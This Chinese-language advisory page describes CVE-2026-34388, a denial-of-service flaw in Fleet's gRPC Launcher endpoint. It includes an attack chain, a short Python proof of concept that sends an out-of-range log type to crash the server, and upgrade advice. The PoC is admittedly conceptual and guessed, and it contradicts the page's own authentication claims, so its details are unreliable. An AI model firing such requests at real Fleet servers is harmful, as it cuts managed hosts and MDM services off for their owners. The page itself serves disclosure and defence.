CVE-2026-34388 CVSS 7.5 高危

CVE-2026-34388 Fleet gRPC拒绝服务漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34388

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fleet

漏洞概述

Fleet是一个开源设备管理软件。在4.81.0版本之前，其gRPC Launcher端点存在一个拒绝服务漏洞。经过认证的主机可以通过向该端点发送一个非预期的日志类型值，导致整个Fleet服务器进程崩溃。这会中断所有已连接的主机、MDM注册以及API消费者的服务。该问题在4.81.0版本中得到了修复。

技术细节

该漏洞源于Fleet服务器的gRPC Launcher端点在处理日志类型参数时缺乏足够的校验。攻击者可以控制已认证的主机向服务器发送特制的gRPC请求，其中包含超出预期范围的日志类型值。服务器在解析该参数时未能处理这种异常输入，导致未捕获的异常或错误，进而引发整个服务器进程的崩溃。由于服务器进程终止，所有依赖该服务的功能（包括主机管理、MDM注册和API接口）都将变得不可用，导致严重的拒绝服务。

攻击链分析

STEP 1

1. 身份验证

攻击者获取已注册主机的凭证或控制权，通过Fleet客户端认证机制连接到服务器。

STEP 2

2. 构造恶意请求

攻击者利用gRPC接口，向Launcher端点构造一个包含非预期日志类型值的请求。

STEP 3

3. 发送请求

将特制的请求发送给Fleet服务器。

STEP 4

4. 触发崩溃

服务器处理异常输入失败，导致整个进程崩溃，服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import grpc

# This is a conceptual PoC demonstrating the trigger
# It requires the Fleet gRPC proto definitions

channel = grpc.insecure_channel('fleet-server:8080')
stub = fleet_proto.LauncherStub(channel)

# Construct a request with an unexpected log type value
# Assuming 99 is an invalid or unexpected enum value for log type
request = fleet_proto.LogRequest(
    log_type=99,  # Unexpected value causing crash
    message="Trigger DoS"
)

try:
    # Send the malicious request
    stub.SendLog(request)
    print("Request sent, server might crash.")
except grpc.RpcError as e:
    print(f"RPC Error (Server might be down): {e.code()}")

影响范围

Fleet < 4.81.0

防御指南

临时缓解措施

建议立即升级到修复版本。如果暂时无法升级，应限制对gRPC端点的网络访问，仅允许受信任的主机IP连接，并部署自动重启机制以最小化服务中断时间。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表